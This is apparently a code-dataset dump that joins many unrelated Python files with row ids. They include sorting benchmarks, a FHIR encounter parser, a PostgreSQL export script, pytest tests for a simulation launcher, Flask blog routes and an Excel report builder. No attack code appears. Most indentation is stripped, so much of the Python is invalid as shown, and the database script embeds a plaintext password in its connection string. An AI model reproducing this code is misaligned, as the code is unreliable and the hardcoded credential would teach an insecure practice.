# plt.plot(sum(DV), sum(T), symbol_dict[self.seq[0].name])
#n = 0
ratio = list([0]*(self.__n_legs))
coeff = 0.3
for i in xrange(0,self.__n_legs):
ratio[i] = (DV[i]/(T[i]*DAY2SEC))
if close_d[0] >= 2:
if close_d[1] >= 2:
if close_d[2] >= 2:
if close_d[3] >= 2:
if ratio[1] <= coeff*(0.1/2000):
if ratio[2] <= coeff*(0.1/2000):
if ratio[3] <= coeff*(0.1/2000):
if ratio[0] <= coeff*(0.1/2000):
plt.plot(sum(DV), sum(T), symbol_dict[self.seq[0].name])
#for i in xrange(0,self.__n_legs):
# if close_d[i] > 2:
# plt.plot(sum(DV), sum(T), symbol_dict[self.seq[0].name])
# else:
# print "\n the closest distance is less than 2*Rj "
#print "\n number of sequences that do not crash " + str(n)
plt.show()
def human_readable_extra(self):
return ("\n\t Sequence: " + [pl.name for pl in self.seq].__repr__() +
"\n\t Time of flights: " + self.tof.__repr__())
|
984,670 | 79b1f02be4171c517d1ac21c107213d28eee37dc | import calendar
from typing import Dict
from collections import namedtuple
from db_tools.database import Encounter
from .tools import safe_get_value, safe_get_date, BaseProcess, ConvertException
day_stat = namedtuple('day_stat', ['day', 'visit_amount'])
class EncounterProcess(BaseProcess):
_model = Encounter
_result_template = {
'days_visit': {i: 0 for i in range(7)}
}
def process_stat(self, entity: Dict):
super().process_stat(entity)
for i in range(entity['start_date'].weekday(), entity['end_date'].weekday() + 1):
self._result['days_visit'][i] += 1
def print_result(self):
super().print_result()
most_popular: day_stat = None
least_popular: day_stat = None
for day, visit_amount in self._result['days_visit'].items():
if most_popular is None or most_popular.visit_amount < visit_amount:
most_popular = day_stat(day, visit_amount)
if least_popular is None or least_popular.visit_amount > visit_amount:
least_popular = day_stat(day, visit_amount)
print(f"The most popular day is {calendar.day_name[most_popular.day]}")
print(f"The least popular day is {calendar.day_name[least_popular.day]}")
def entry_convert(self, raw_entry: Dict) -> Dict:
if 'id' not in raw_entry or not raw_entry['id']:
raise ConvertException("There is no required 'id' field in provided entry.")
patient_source_id = safe_get_value(raw_entry, 'subject', 'reference')[8:]
if patient_source_id not in self._context['patient_mapping']:
raise ConvertException(f"The patient with source_id={patient_source_id} does not exist.")
start_date = safe_get_date(raw_entry, 'period', 'start')
if start_date is None:
raise ConvertException(f"Not valid start_date")
end_date = safe_get_date(raw_entry, 'period', 'end')
if end_date is None:
raise ConvertException(f"Not valid end_date")
yield dict(
source_id=raw_entry['id'],
patient_id=self._context['patient_mapping'][patient_source_id],
start_date=start_date,
end_date=end_date,
type_code=safe_get_value(raw_entry, 'type', 0, 'coding', 0, 'code'),
type_code_system=safe_get_value(raw_entry, 'type', 0, 'coding', 0, 'system')
)
|
984,671 | 445e32998a1dede6891e64a9c24b6c23c462d90a | import time
import random
def selection_sort(arr):
for k in range(len(arr)):
min = k
j = k
while j < len(arr)-1:
j +=1
cur = j
if (arr[cur]<arr[min]):
min = cur
if min != k:
temp = arr[k]
arr[k] = arr[min]
arr[min] = temp
def insertion_sort(arr):
for k in range(1, len(arr)):
cur = arr[k]
j = k
while j > 0 and arr[j-1] > cur:
arr[j] = arr[j-1]
j = j-1
arr[j] = cur
def increasing_order(arr, val):
for k in range(val):
arr.append(k)
def decreasing_order(arr,val):
for k in reversed(range(val)):
arr.append(k)
if __name__ == '__main__':
asc1000_A = list(range(1000))
asc2500_A = list(range(2500))
asc5000_A = list(range(5000))
asc7500_A = list(range(7500))
asc10000_A = list(range(10000))
asc1000_B = list(range(1000))
asc2500_B = list(range(2500))
asc5000_B = list(range(5000))
asc7500_B = list(range(7500))
asc10000_B = list(range(10000))
aList = list(reversed(range(50)))
des1000_A = list(reversed(range(1000)))
des2500_A = list(reversed(range(2500)))
des5000_A = list(reversed(range(5000)))
des7500_A = list(reversed(range(7500)))
des10000_A = list(reversed(range(10000)))
des1000_B = list(reversed(range(1000)))
des2500_B = list(reversed(range(2500)))
des5000_B = list(reversed(range(5000)))
des7500_B = list(reversed(range(7500)))
des10000_B = list(reversed(range(10000)))
temporary = aList
rand1000_A = []
for i in range(1000):
rand1000_A.append(random.randint(0,1000))
rand1000_B = []
for i in range(1000):
rand1000_B.append(rand1000_A[i])
rand2500_A = []
for i in range(2500):
rand2500_A.append(random.randint(0,2500))
rand2500_B = []
for i in range(2500):
rand2500_B.append(rand2500_A[i])
rand5000_A = []
for i in range(5000):
rand5000_A.append(random.randint(0,5000))
rand5000_B = []
for i in range(5000):
rand5000_B.append(rand5000_A[i])
rand7500_A = []
for i in range(7500):
rand7500_A.append(random.randint(0,7500))
rand7500_B = []
for i in rand7500_A:
rand7500_B.append(i)
rand10000_A = []
for i in range(10000):
rand10000_A.append(random.randint(0,10000))
rand10000_B = []
for i in range(10000):
rand10000_B.append(rand10000_A[i])
start = time.process_time()
insertion_sort(asc1000_A)
end = time.process_time()
print('One Thousand Increasing Insertion: ' + '{:.6f}'.format(end-start))
start = time.process_time()
insertion_sort(asc2500_A)
end = time.process_time()
print('Two Thousand Five Hundred Increasing Insertion: ' + '{:.6f}'.format(end-start))
start = time.process_time()
insertion_sort(asc5000_A)
end = time.process_time()
print('Five Thousand Increasing Insertion: ' + '{:.6f}'.format(end-start))
start = time.process_time()
insertion_sort(asc7500_A)
end = time.process_time()
print('Seven Thousand Five Hundred Increasing Insertion: ' + '{:.6f}'.format(end-start))
start = time.process_time()
insertion_sort(asc10000_A)
end = time.process_time()
print('Ten Thousand Increasing Insertion: ' + '{:.6f}'.format(end-start))
temparr = []
increasing_order(temparr,1000)
print(temparr)
temporary = []
decreasing_order(temporary,1000)
print(temporary)
#print(temporary)
#insertion_sort(aList)
#print(temporary)
#insertion_sort(a)
#print(a)
#print("")
#selection_sort(b)
#print(b) |
984,672 | c7cc02a5fea295a2cc79fa33f463f22314f2bcb5 | list2 = [1,2,3,4,5]
list1 = [1,2,3,4,5,6]
print "modulo", 9%9
result = all(elem in list1 for elem in list2)
if result:
print("Yes, list1 contains all elements in list2")
else :
print("No, list1 does not contains all elements in list2")
if str(list2[-1]) != str(4):
print "test"
def stringToList(string):
spliced = []
spliced = string.split("]")
splicedIntRaster = []
for each in spliced:
splicedInt = []
for characters in each:
if characters.isdigit():
splicedInt.append(int(characters))
if splicedInt:
splicedIntRaster.append(splicedInt)
raster = []
for y in range(9):
temp = []
for x in range(9):
temp.append(splicedIntRaster[y*9+x])
raster.append(temp)
return raster
a = [[[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1], [7], [1, 2, 3, 4, 5, 6, 7, 8, 9], [8], [1, 2, 3, 4, 5, 6, 7, 8, 9], [2], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[6], [1, 2, 3, 4, 5, 6, 7, 8, 9], [4], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [7], [3]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [4], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[4], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [5], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [9]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [8], [1, 2, 3, 4, 5, 6, 7, 8, 9], [3], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1], [2], [4], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [2], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [5], [1, 2, 3, 4, 5, 6, 7, 8, 9], [8]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [3], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[8], [5], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]]]
print len(a)
a = str(a)
stringToList(a)
|
984,673 | dc9c4ecb51fe3487a22dafe32ff78f1e9d9b7761 | import postgresql
file_name = 'tablStudent.txt'
db = postgresql.open("pq://postgres:G24O02d24230303@127.0.0.1:5432/my_db")
tablStudent = db.prepare("select * from tstudent")
print('TablStudent :')
with db.xact():
with open(file_name,'w', encoding = 'UTF-8') as f:
for row in tablStudent:
f.write(str(row)+'\n')
with open(file_name, 'r', encoding='UTF-8') as file:
tablStudent = file.readlines()
for row in tablStudent:
print(row.rstrip())
|
984,674 | ff92ee5ec72c016ab07b1c58b10157dc66fab85b | #!/usr/bin/env python3
n = int(input())
s = n * (n+1) * (2*n+1) // 6
print (s) |
984,675 | 24be4f01491259ebf483b2e70e458774b26d0d12 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from tempest.lib.cli import base
class ClientTestBase(base.ClientTestBase):
"""Base class for ceilometerclient tests.
Establishes the ceilometer client and retrieves the essential environment
information.
"""
def _get_clients(self):
cli_dir = os.environ.get(
'OS_CEILOMETER_CLIENT_EXEC_DIR',
os.path.join(os.path.abspath('.'), '.tox/functional/bin'))
return base.CLIClient(
username=os.environ.get('OS_USERNAME'),
password=os.environ.get('OS_PASSWORD'),
tenant_name=os.environ.get('OS_TENANT_NAME'),
uri=os.environ.get('OS_AUTH_URL'),
cli_dir=cli_dir)
def ceilometer(self, *args, **kwargs):
return self.clients.ceilometer(*args, **kwargs)
|
984,676 | a12c5cf31ccbf8b3ed3b2ab19343fbbffa6fe857 | import numpy as np
l = [ [5, 6, 9, 10, 11], [ 1, 2, 3, 5, 6 ] ]
print( l, type(l), len(l) )
arr = np.array( l )
print( f"arr = { arr }", type( arr ), len( arr ), arr.shape )
print( f"arr[0] = { arr[0] }" )
print()
print( "Printing Numpy Array in the loop" )
for i in arr:
print( f"i : { i }", end=' and j : ' )
for j in i:
print( j, end=' -> ' )
print()
arr[1] = 9
print( "Checking Mutability, " )
print( f"arr = { arr }" )
arr[1][3] = 5
print( f"arr = { arr }" )
print()
counter = 0
print( '[', end = '')
for i in range( len( l ) ):
print( '[', end=' ' )
for j in l[i]:
print( j, end=' ' )
if( i == ( len(l) - 1 ) ):
print(']', end=']')
else:
print( ']' ) |
984,677 | 149547a1382999b470dc3dccc945bbe62688c309 | import pytest
import re
import os
import sys
import shutil
from pathlib import Path
from io import StringIO
from ast import literal_eval
from launch_multiple_simulations import Launcher
import institutionevolution.filemanip as fman
from institutionevolution.population import Population as Pop
from files import INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE
class TestAutomaticWorkflow(object):
def test_single_sim_reads_and_writes_from_same_folder(self):
dirpath = Path('simulations')
if dirpath.exists() and dirpath.is_dir():
shutil.rmtree(dirpath)
shutil.copytree('test/test', 'simulations')
self.pop = Pop(inst='simulations')
self.pop.numberOfGenerations = 3
self.pop.runSimulation()
self.outputfiles = ["out_consensus.txt", "out_demography.txt", "out_phenotypes.txt", "out_resources.txt", "out_technology.txt"]
for file in self.outputfiles:
assert file in os.listdir('simulations')
shutil.rmtree('simulations')
def test_script_reads_arguments_properly(self):
self.l = Launcher("tralala", "blablabla")
assert self.l.metafolder == "tralala"
assert self.l.parfile == "blablabla"
def test_launcher_can_read_general_parameter_file(self):
self.l = Launcher(metafolder="tralala", parfile="blablabla", launchfile="test/test/general_parameters.txt")
assert self.l.strINITFILE == "numberOfDemes,10\ninitialDemeSize,20\nnumberOfGenerations,20\nindividualBaseResources,1"
assert self.l.strPHENFILE == "0.0\n0.0\n0.0\n0.0"
assert self.l.strTECHFILE == "1"
assert self.l.strPARAFILE == "mutationRate,0.01\nmutationStep,0.02\nmigrationRate,0.5"
def test_script_creates_metafolder(self):
self.l = Launcher("simulations", "blablabla")
self.l.createFolder(self.l.metafolder)
assert os.path.exists('simulations') == 1, "did not create metafolder"
shutil.rmtree('simulations')
def test_script_writes_par_files(self):
self.l = Launcher("simulations", "blablabla")
self.l.createFolder(self.l.metafolder)
self.l.writeParameterFilesInFolder(fitfun="func", pname=["first","secnd","third"], pval=[1,2,3])
self.dirpath = os.getcwd()
self.fileslist = os.listdir('simulations/func_first1secnd2third3')
self.inputfiles = [INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE]
try:
for file in self.inputfiles:
assert file in self.fileslist
shutil.rmtree('simulations')
except AssertionError as e:
shutil.rmtree('simulations')
assert False, "one or more parameter file(s) missing. Folder contents: {0}".format(self.fileslist)
def test_script_handles_files_already_exists_issue(self):
shutil.copytree('test/test', 'simulations')
self.l = Launcher('simulations', 'blablabla')
self.l.writeParameterFilesInFolder(fitfun="func", pname=["first","secnd","third"], pval=[1,2,3])
try:
with open('simulations/func_first1secnd2third3/'+FITNESS_PARAMETERS_FILE, 'r') as f:
assert len(f.readlines()) == 3, "file not replaced by correct parameter values"
shutil.rmtree('simulations')
except AssertionError as e:
shutil.rmtree('simulations')
assert False, "file not replaced by correct parameter values"
def test_script_reads_parameter_ranges_file(self, createParameterRangesFile):
# SIMPLE, NO RANGES
createParameterRangesFile()
self.l = Launcher('simulations', 'parameter_ranges.txt')
self.l.readParameterInfo()
#assert False, "names:{0},start:{1},end:{2},step:{3},fit:{4}".format(self.l.parname,self.l.parstart,self.l.parend,self.l.parstep,self.l.fitnessFunction)
assert self.l.parname == ["first", "secnd", "third"]
self.l.parstart == [1,2,3]
self.l.parend == [None] * 3
self.l.parstep == [None] * 3
assert self.l.fitnessFunction == 'pgg', self.l.lastLine
# WITH RANGES
createParameterRangesFile(multi=True)
#self.l = Launcher('simulations', 'parameter_ranges.txt')
self.l.readParameterInfo()
assert self.l.parname == ["first", "secnd", "third"]
self.l.parstart == [1.1,2.3,3.4]
self.l.parend == [1.3,None,3.6]
self.l.parstep == [0.1,None,0.1]
assert self.l.fitnessFunction == 'pgg'
os.remove('parameter_ranges.txt')
def test_ranges_creation(self, createParameterRangesFile):
createParameterRangesFile(multi=True)
self.l = Launcher('simulations', 'parameter_ranges.txt')
self.l.readParameterInfo()
assert self.l.parend == ['1.3',None,'3.6']
assert self.l.parstep == ['0.1', None, '0.1']
self.l.createRanges()
assert self.l.parend == ['1.3',None,'3.6']
assert self.l.parstep == ['0.1', None, '0.1']
assert len(self.l.ranges) == 3, "wrong number of ranges"
checkList = [[1.1,1.2],[2.3],[3.4,3.5]]
for par in range(len(self.l.ranges)):
assert pytest.approx(self.l.ranges[par]) == checkList[par], "wrong range for {0}: {1} when it should be {2}".format(self.l.parname[par],self.l.ranges[par],checkList[par])
os.remove('parameter_ranges.txt')
def test_combinations_creation(self, createParameterRangesFile):
createParameterRangesFile(multi=True)
self.l = Launcher('simulations', 'parameter_ranges.txt')
self.l.readParameterInfo()
self.l.createRanges()
self.l.createCombinations()
allCombs = [(1.1,2.3,3.4),(1.1,2.3,3.5),(1.2,2.3,3.4),(1.2,2.3,3.5)]
for parcomb in allCombs:
assert pytest.approx(parcomb) in self.l.combinations
os.remove('parameter_ranges.txt')
def test_single_par_combination_gets_a_full_folder(self):
self.l = Launcher('simulations', 'parameter_ranges.txt')
self.l.createFolder(self.l.metafolder)
self.l.writeParameterFilesInFolder(fitfun='pgg', pname=('small','big'), pval=(0.3,0.5))
self.subfoldername = 'pgg_small0.3big0.5'
assert os.path.exists('simulations/'+self.subfoldername), "create subfolder"
self.fileslist = os.listdir('simulations/'+self.subfoldername)
self.inputfiles = [INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE]
try:
for file in self.inputfiles:
assert file in self.fileslist
pars = fman.extractColumnFromFile('simulations/'+self.subfoldername+'/'+FITNESS_PARAMETERS_FILE, 0, str)
vals = fman.extractColumnFromFile('simulations/'+self.subfoldername+'/'+FITNESS_PARAMETERS_FILE, 1, float)
assert pars == ['small','big'], "wrong parameter name"
assert vals == [0.3,0.5], "wrong parameter value"
shutil.rmtree('simulations')
except AssertionError as e:
shutil.rmtree('simulations')
assert False, "one or more parameter value(s) missing. File contents: {0},{1}".format(pars,vals)
def test_script_reads_parameter_ranges_file_and_writes_files_correctly_in_different_folders(self, createParameterRangesFile):
createParameterRangesFile(multi=True)
self.l = Launcher('simulations', 'parameter_ranges.txt')
self.l.writeParameterFilesInFolders()
self.subfoldernames = ['pgg_first1.1secnd2.3third3.4','pgg_first1.1secnd2.3third3.5','pgg_first1.2secnd2.3third3.4','pgg_first1.2secnd2.3third3.5']
self.parvalues = [[1.1,2.3,3.4],[1.1,2.3,3.5],[1.2,2.3,3.4],[1.2,2.3,3.5]]
self.inputfiles = [INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE]
for comb in range(len(self.parvalues)):
folder = self.subfoldernames[comb]
assert os.path.exists('simulations/'+folder), "did not create specific simulation file: {0}".format(os.listdir('simulations'))
fileslist = os.listdir('simulations/'+folder)
try:
for file in self.inputfiles:
assert file in fileslist
pars = fman.extractColumnFromFile('simulations/'+folder+'/'+FITNESS_PARAMETERS_FILE, 0, str)
vals = fman.extractColumnFromFile('simulations/'+folder+'/'+FITNESS_PARAMETERS_FILE, 1, float)
assert pars == ['first','secnd','third'], "wrong parameter name"
assert pytest.approx(vals) == self.parvalues[comb], "wrong parameter value"
except AssertionError as e:
shutil.rmtree('simulations')
os.remove('parameter_ranges.txt')
assert False, "one or more parameter value(s) missing. File contents: {0},{1}".format(pars,vals)
shutil.rmtree('simulations')
os.remove('parameter_ranges.txt')
def test_parameter_files_are_not_empty(self, createParameterRangesFile):
createParameterRangesFile()
self.l = Launcher('simulations', 'parameter_ranges.txt')
self.l.writeParameterFilesInFolders()
self.fileslist = os.listdir('simulations')
try:
for file in self.fileslist:
assert os.path.getsize('simulations/'+file) != 0, "file is empty"
shutil.rmtree('simulations')
os.remove('parameter_ranges.txt')
except AssertionError as e:
shutil.rmtree('simulations')
os.remove('parameter_ranges.txt')
assert False, "file is empty"
def test_script_can_take_parameter_ranges(self, createParameterRangesFile):
createParameterRangesFile(multi=True)
self.l = Launcher('simulations', 'parameter_ranges.txt')
self.l.writeParameterFilesInFolders()
files = folders = 0
for _, dirnames, filenames in os.walk('simulations'):
# ^ this idiom means "we won't be using this value"
files += len(filenames)
folders += len(dirnames)
shutil.rmtree('simulations')
os.remove('parameter_ranges.txt')
assert folders == 4, "wrong number of subfolders"
assert files == 5*4, "wrong total number of parameters files"
def test_script_can_launch_single_simulation(self):
self.dir = 'simulations/pgg_test01'
shutil.copytree('test/test', self.dir)
self.l = Launcher('simulations', 'parameter_ranges.txt')
sim = self.l.launchSimulation(path=self.dir)
assert os.path.exists(self.dir)
self.fileslist = os.listdir(self.dir)
self.outputfiles = ['out_phenotypes.txt', 'out_demography.txt', 'out_technology.txt', 'out_resources.txt', 'out_consensus.txt']
try:
for file in self.outputfiles:
assert file in self.fileslist, "file {0} missing from output".format(file)
shutil.rmtree('simulations')
except AssertionError as e:
shutil.rmtree('simulations')
assert False, "file {0} missing from output".format(file)
def test_single_simulation_output_not_empty(self):
self.dir = 'simulations/pgg_test02'
shutil.copytree('test/test', self.dir)
assert os.path.isdir(self.dir), "not a directory"
self.l = Launcher('simulations', 'parameter_ranges.txt')
sim = self.l.launchSimulation(path=self.dir)
self.outputfiles = ['out_phenotypes.txt', 'out_demography.txt', 'out_technology.txt', 'out_resources.txt', 'out_consensus.txt']
for file in self.outputfiles:
with open(self.dir+'/'+file) as f:
lines = f.readlines()
assert len(lines) == 10, "printed {0} generations instead of 10".format(len(lines))
try:
floatlines = [float(x.split(',')[0]) for x in lines]
except AssertionError as e:
shutil.rmtree('simulations')
assert False, "{0} are not numbers".format(lines)
shutil.rmtree('simulations')
def test_script_can_launch_all_simulations(self):
self.dirs = ['pgg_test1','pgg_test2','pgg_test3']
os.mkdir('simulations')
for fold in self.dirs:
shutil.copytree('test/test', 'simulations/'+fold)
assert fold in os.listdir('simulations')
assert os.path.isdir('simulations/'+fold), "not a directory"
self.l = Launcher('simulations', 'parameter_ranges.txt')
sim = self.l.launchSimulations(path='simulations')
self.outputfiles = ['out_phenotypes.txt', 'out_demography.txt', 'out_technology.txt', 'out_resources.txt', 'out_consensus.txt']
for fold in self.dirs:
for file in self.outputfiles:
try:
assert file in os.listdir('simulations/'+fold), "file {0} missing from output in folder {1}".format(file,fold)
except AssertionError as e:
shutil.rmtree('simulations')
assert False, "file {0} missing from output in folder {1}".format(file,fold)
shutil.rmtree('simulations')
def test_full_workflow(self):
with open("parameter_ranges.txt", 'w') as f:
f.writelines(['fun,pgg\n','fb,2\n','b,0.5,0.7,0.1\n','c,0.05,0.07,0.01\n','gamma,0.01\n'])
self.l = Launcher('simulations', 'parameter_ranges.txt')
sims = self.l.launch()
self.dirs = os.listdir('simulations')
self.infiles = [INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE]
self.outfiles = ['out_phenotypes.txt', 'out_demography.txt', 'out_technology.txt', 'out_resources.txt', 'out_consensus.txt']
self.allfiles = self.infiles + self.outfiles
for fold in self.dirs:
for file in self.allfiles:
try:
assert file in os.listdir('simulations/'+fold), "file {0} missing from folder {1}".format(file,fold)
except AssertionError as e:
shutil.rmtree('simulations')
os.remove('parameter_ranges.txt')
assert False, "file {0} missing from output in folder {1}".format(file,fold)
shutil.rmtree('simulations')
os.remove('parameter_ranges.txt') |
984,678 | 65fd328e5252379e333368c6250a60e681360a80 | from flask import render_template, url_for, flash, redirect, request, abort
from app.models import User, Post
from app.forms import RegistrationForm, LoginForm, UpdateAccountForm, PostForm
# ! here inport bcrypt not Bcrypt
from app import application, db, bcrypt
from flask_login import login_user, current_user, logout_user,login_required
from .main import run_result
import json
# call crawler
@application.route('/e/e')
def call_crawler():
print('be called')
return run_result()
@application.route('/')
@application.route('/home')
def home():
posts = Post.query.all()
return render_template('home.html', posts=posts)
# method=['GET', 'POST'] allows get and post in this page
@application.route('/register', methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RegistrationForm()
# if submitted content is validated, flash and return to home page
if form.validate_on_submit():
# hash password from form
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
# create a user and save it into DB
user = User(username=form.username.data, email=form.email.data, password=hashed_password)
db.session.add(user)
db.session.commit()
flash(f'Account created for {form.username.data}!', category='success')
return redirect(url_for('home'))
return render_template('register.html', title='Register', form=form)
@application.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
# if user exists and the password is correct
# user.password from DB, and second parameter from input
if user and bcrypt.check_password_hash(user.password, form.password.data):
# don't rearch this function
login_user(user, remember=form.remember.data)
return redirect(url_for('home'))
else:
flash('Login Unsuccessful', category='danger')
return render_template('login.html', title='Login', form=form)
@application.route("/logout")
def logout():
logout_user()
return redirect(url_for('home'))
@application.route("/account", methods=['GET', 'POST'])
@login_required
def account():
update_form = UpdateAccountForm()
if update_form.validate_on_submit():
current_user.username = update_form.username.data
current_user.email = update_form.email.data
db.session.commit()
flash('Your account has been updated', category='success')
# return here to avoid something
return redirect(url_for('account'))
elif request.method == "GET":
update_form.username.data = current_user.username
update_form.email.data = current_user.email
image_file = url_for('static', filename=current_user.image_file)
return render_template('account.html', title='Account', image_file=image_file, form=update_form)
@application.route("/post/new", methods=['GET', 'POST'])
@login_required
def post_new():
post_form = PostForm()
if post_form.validate_on_submit():
post = Post(title=post_form.title.data, content=post_form.content.data, author=current_user)
db.session.add(post)
db.session.commit()
flash('Your post has been created', category='success')
return redirect(url_for('home'))
return render_template('create_post.html', title='New Post', form=post_form, legend='New Post')
@application.route("/post/<int:post_id>")
def post(post_id):
# get page or return 404 no found
post = Post.query.get_or_404(post_id)
return render_template('post.html', title=post.title, post=post)
@application.route("/post/<int:post_id>/update", methods=['GET', 'POST'])
@login_required
def update_post(post_id):
post = Post.query.get_or_404(post_id)
if post.author != current_user:
# Request Forbidden
abort(403)
update_form = PostForm()
if update_form.validate_on_submit():
post.title = update_form.title.data
post.content = update_form.content.data
db.session.commit()
flash('Your post has been updated!', 'success')
return redirect(url_for('post', post_id=post.id))
elif request.method == 'GET':
update_form.title.data = post.title
update_form.content.data = post.content
return render_template('create_post.html', title='Update Post',
form=update_form, legend='Update Post')
@application.route("/post/<int:post_id>/delete", methods=['POST'])
@login_required
def delete_post(post_id):
post = Post.query.get_or_404(post_id)
if post.author != current_user:
abort(403)
db.session.delete(post)
db.session.commit()
flash('Your post has been deleted!', 'success')
return redirect(url_for('home'))
@application.route("/post/new-app", methods=['GET', 'POST'])
def post_new_app():
if request.method == 'GET':
posts = Post.query.all()
data = []
for post in posts:
each_post = {}
each_post['id'] = str(post.id)
each_post['article_title'] = post.title
each_post['content'] = post.content
data.append(each_post)
# convert to json format
data_json = json.dumps(data, ensure_ascii=False)
return data_json
post = Post(title=request.json['title'], content=request.json['content'], user_id=1)
db.session.add(post)
db.session.commit()
return 'post successful'
|
984,679 | 5bffe1c3669850ebeaf6904b1c9a9cfa85d8d752 | import pandas as pd
import shutil
import openpyxl
from module.globals import *
import module.forms_maker._0420502_SCHA as scha
import module.forms_maker._0420502_Rasshifr as rf
import module.forms_maker._0420502_Podpisant as pp
import module.forms_maker._0420502_Zapiski as zap
import module.forms_maker._0420503_Prirost as prst
# from module.dataCheck import checkSheetsInFileID
# ================================================================
def main(id_fond, path_to_report, file_new_name, file_Avancore_scha):
# ----------------------------------------------------------
# # Загрузка файла с Идентификаторами
# df_identifier = pd.read_excel(dir_shablon + fileID,
# sheet_name=None,
# index_col=None,
# header=None)
# # Проверка файла с идентификаторами на предмет наличия всех вкладок и лишних вкладок
# # (111 - pas. - защита структуры в файле с идентификаторами)
# checkSheetsInFileID(df_identifier)
# ----------------------------------------------------------
# Загрузка файла-Аванкор-СЧА
df_avancor = pd.read_excel(path_to_report + '/' + file_Avancore_scha,
index_col=None,
header=None)
# устанавливаем начальный индекс не c 0, а c 1 (так удобнее)
df_avancor.index += 1
df_avancor.columns += 1
# ----------------------------------------------------------
# Создаем новый файл отчетности 'file_fond_name',
# создав копию шаблона 'file_shablon'
shutil.copyfile(dir_shablon + fileShablon, path_to_report + '/' + file_new_name)
# ---------------------------------------------------------
# Загружаем данные из файла таблицы xbrl
wb = openpyxl.load_workbook(filename=(path_to_report + '/' + file_new_name))
# ----------------------------------------------------------
# Формимируем файл-xbrl-СЧА:
# Формируем итоговые формы СЧА
scha.scha(wb, id_fond, df_avancor)
# Формируем итоговые формы-расшифровки
rf.rashifr(wb, df_avancor, id_fond)
# Формирование форм СЧА - падписанты
pp.podpisant(wb, df_avancor, id_fond)
# Формирование форм СЧА - пояснительные записки
zap.zapiski_new(wb, df_avancor, id_fond)
# Удаляем формы-Прироста, которые не заполняются
# (остальные формы Прироста формируются отдельно)
prst.prirost(wb)
# Сохраняем результат
wb.save(path_to_report + '/' + file_new_name)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if __name__ == '__main__':
pass
|
984,680 | b47a845ca2700fa9a5a5a0d23848116cf68647d7 | from django.shortcuts import render
from django.shortcuts import redirect
from django.shortcuts import get_object_or_404
from .models import Post
from .models import Tag
from django.views.generic import View
from .forms import TagForm
#from django.http import HttpResponse
# def post_list(request):
# return HttpResponse('<h1 align="center">Hello! Post_list</h1>')
# Create your views here.
# n = ['Nikolay', 'Aleksandr', 'Django', 'George']
def posts_list(request):
